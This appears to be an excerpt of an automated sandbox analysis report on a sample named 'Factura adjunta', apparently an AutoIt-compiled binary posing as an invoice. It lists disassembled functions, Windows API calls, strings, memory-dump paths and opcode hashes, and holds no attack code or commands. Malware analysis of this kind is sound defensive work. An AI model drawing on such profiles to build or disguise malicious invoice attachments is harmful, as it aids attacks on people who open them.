                            • Instruction Fuzzy Hash: B221D379600209EF8B15DF98D9808EA7BB6FB8C340B104158FE05E3320EA31ED61DBA0
                            Function 008280A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0082830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008280C8,?,00000000,?,?), ref: 00828322
                            • inet_addr.WS2_32(00000000), ref: 008280CB
                            • htons.WS2_32(00000000), ref: 00828108
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ByteCharMultiWidehtonsinet_addr
                            • String ID: 255.255.255.255
                            • API String ID: 2496851823-2422070025
                            • Opcode ID: 0aed9e3b3d9c18006f945b6c8b8873c7d9ff03cb01b9218dd6153ee3275ae856
                            • Instruction ID: 2d5884c7b21f0957f36d1fc0481e52f0efd692902acaf1155010404687f64c3b
                            • Opcode Fuzzy Hash: 0aed9e3b3d9c18006f945b6c8b8873c7d9ff03cb01b9218dd6153ee3275ae856
                            • Instruction Fuzzy Hash: 0811A134600219EBDF20AFA8DC46FEDB764FF54320F108526E911E72D2DB72A865CA95
                            Function 007B2327 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID: h)
                            • API String ID: 0-3328819710
                            • Opcode ID: 021f61b94de717926ca3ceb849317ca6454b95d504ccaece05c55886e23a845b
                            • Instruction ID: da8b9854483ca094c7d51cf4abfe98d73eb2ebc9078aed22f34c6497fbdba1ec
                            • Opcode Fuzzy Hash: 021f61b94de717926ca3ceb849317ca6454b95d504ccaece05c55886e23a845b
                            • Instruction Fuzzy Hash: 57116D38600604AFDB21DF29C840E957BE6FF49320F148269F9298B2A1C775ED81CF90
                            Function 007C0A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007B3C26,008762F8,?,?,?), ref: 007C0ACE
                              • Part of subcall function 007B7D2C: _memmove.LIBCMT ref: 007B7D66
                            • _wcscat.LIBCMT ref: 007F50E1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: FullNamePath_memmove_wcscat
                            • String ID: 0Z
                            • API String ID: 257928180-3078638214
                            • Opcode ID: bff4647707f29b176f2dc961b71fe81a26c79ef39b58a938e08cd165873f83fa
                            • Instruction ID: a439f9db38250394add80539a249f037bdda111ef1d618428cefc77d65584021
                            • Opcode Fuzzy Hash: bff4647707f29b176f2dc961b71fe81a26c79ef39b58a938e08cd165873f83fa
                            • Instruction Fuzzy Hash: E011A574A04208DA8B00EBB4CC45FDD73B8FF08354F0044A9BA4CD7295EA78DA889B91
                            Function 008092E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                              • Part of subcall function 0080B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0080B0E7
                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00809355
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: ba0a2cab2e4f4e866514f012a686c242d76b290067abd9e70f121d17c52a648e
                            • Instruction ID: fd066829d5e90a01e834ea62924cd75b78c096c40464c5e8a51e04cc8a75de2d
                            • Opcode Fuzzy Hash: ba0a2cab2e4f4e866514f012a686c242d76b290067abd9e70f121d17c52a648e
                            • Instruction Fuzzy Hash: BC01D271A01218ABCB04EB64CC96DFE776DFF46320B110619F972A73D2EA355808C650
                            Function 008091DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                              • Part of subcall function 0080B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0080B0E7
                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 0080924D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: faea8feec3c0fe5fd1775f3eb5fff5f13e7bbefb87b99d21278000c7ce980f4f
                            • Instruction ID: b2466f1e3196c866264b4f908bdbd3c72860664a7a9c7bf2efe8152583d86d55
                            • Opcode Fuzzy Hash: faea8feec3c0fe5fd1775f3eb5fff5f13e7bbefb87b99d21278000c7ce980f4f
                            • Instruction Fuzzy Hash: D4014871A41108BBCB14EBA4CD97EFF77ACEF55300F140115F562A72D2EA255E089661
                            Function 00809264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                              • Part of subcall function 0080B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0080B0E7
                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 008092D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: ada6d1fbad1089cb783bedae96c1f7e03437f336cf193a11b711791227db169f
                            • Instruction ID: 7e2e54e8135026667801932bd07e2b879a5b6580deae3c8144f58f460b2b5f0a
                            • Opcode Fuzzy Hash: ada6d1fbad1089cb783bedae96c1f7e03437f336cf193a11b711791227db169f
                            • Instruction Fuzzy Hash: 2D016271A41108BBCB04EBA4CD96EFF77ACEF15300F240115F962E72D2DA255E089676
                            Function 008151CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp
                            • String ID: #32770
                            • API String ID: 2292705959-463685578
                            • Opcode ID: 1f348fa8d848df2c4663472c33140bd332a302f06806b07b975ab9bac04b8062
                            • Instruction ID: 334a9e89c4e597f959a95b54b3ae9322f89220d1b3f6c79bb5328a3b5a59b168
                            • Opcode Fuzzy Hash: 1f348fa8d848df2c4663472c33140bd332a302f06806b07b975ab9bac04b8062
                            • Instruction Fuzzy Hash: 94E02232A002286AE3209B99AC49AA7F7ACFB80731F00006BF914D3140E6609A448BE1
                            Function 008081BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008081CA
                              • Part of subcall function 007D3598: _doexit.LIBCMT ref: 007D35A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Message_doexit
                            • String ID: AutoIt$Error allocating memory.
                            • API String ID: 1993061046-4017498283
                            • Opcode ID: 372da789961f26328f9f93ae683dfe9f7386283d3459b99f62cc38797af709e8
                            • Instruction ID: 7ae0d1e87f5e66ee3399d94d6b87174446957569afe21616c912b0c64500e0a7
                            • Opcode Fuzzy Hash: 372da789961f26328f9f93ae683dfe9f7386283d3459b99f62cc38797af709e8
                            • Instruction Fuzzy Hash: 7BD0123238531872D22432A56D0FBC575489B15B51F004456FB48956D38DDA59D142E9
                            Function 007EB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007EB564: _memset.LIBCMT ref: 007EB571
                              • Part of subcall function 007D0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00875158,00000000,00875144,007EB540,?,?,?,007B100A), ref: 007D0B89
                            • IsDebuggerPresent.KERNEL32(?,?,?,007B100A), ref: 007EB544
                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007B100A), ref: 007EB553
                            Strings
                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007EB54E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                            • API String ID: 3158253471-631824599
                            • Opcode ID: 0f6a05802a81731e242cc7bc9f99fcf77b3477532238d01d5c0411f2fb937f37
                            • Instruction ID: 90cb234c65d7b4b6a970083dad74d1fcef773b8591d2f1ee5fd1eafd706673ef
                            • Opcode Fuzzy Hash: 0f6a05802a81731e242cc7bc9f99fcf77b3477532238d01d5c0411f2fb937f37
                            • Instruction Fuzzy Hash: 69E06DB0601751CBD760DF29D9083437BE0BB08755F00892DE986C2762EBB8D448CBA1
                            Function 00835BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                            Download Yara Rule
                            APIs
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00835BF5
                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00835C08
                              • Part of subcall function 008154E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0081555E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: bc9ea47df93364b4bd70d2de6702aa124852c733d74ffd3a2ede9b80177d8cb8
                            • Instruction ID: f4167feeb615c364ebbc6f36410ca683bb4b0216689ee48def229f969cf2bca6
                            • Opcode Fuzzy Hash: bc9ea47df93364b4bd70d2de6702aa124852c733d74ffd3a2ede9b80177d8cb8
                            • Instruction Fuzzy Hash: 13D0C932788711B6E768AB70AC0BFD76A14FB91B51F010C25B756EA1E1D9E85840CA94